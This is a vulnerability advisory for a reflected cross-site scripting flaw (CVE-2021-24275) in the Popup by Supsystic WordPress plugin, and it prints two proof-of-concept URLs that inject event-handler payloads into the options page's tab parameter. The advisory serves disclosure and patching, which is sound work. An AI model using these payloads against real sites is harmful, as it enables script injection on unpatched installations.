Popup by Supsystic < 1.10.5 – Reflected Cross-Site scripting (XSS) | CVE 2021-24275 | Plugin Vulnerabilities

Description

The plugin did not sanitise the tab parameter of its options page before outputting it in an attribute, leading to a reflected Cross-Site Scripting issue

Proof of Concept

/wp-admin/admin.php?page=popup-wp-supsystic&tab="onmouseover=alert(1)//

/wp-admin/admin.php?page=popup-wp-supsystic&tab="+style=animation-name:rotation+onanimationstart=alert(/XSS/)//

Affects Plugins

popup-by-supsystic

Fixed in 1.10.5

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

0xB9

Submitter

0xB9

Submitter twitter

Verified

Yes

WPVDB ID

efdc76e0-c14a-4baf-af70-9d381107308f

Timeline

Publicly Published

2021-04-19 (about 4 years ago)

Added

2021-04-19 (about 4 years ago)

Last Updated

2021-04-20 (about 4 years ago)

Other

Published

Title

Published

2019-06-18

Title

GA Backend Tracking <= 1.2 - XSS

Published

2014-08-01

Title

Better WP Security <= 3.5.3 - inc/secure.php logevent Function URL H&ling Stored XSS

Published

2025-01-16

Title

WOW Best CSS Compiler <= 2.0.2 - Reflected Cross-Site Scripting

Published

2014-10-16

Title

Cforms < 13.2 - XSS

Published

2025-06-19

Title

Gutenberg Blocks – ACF Blocks Suite <= 2.6.11 - Authenticated (Contributor+) Stored Cross-Site Scripting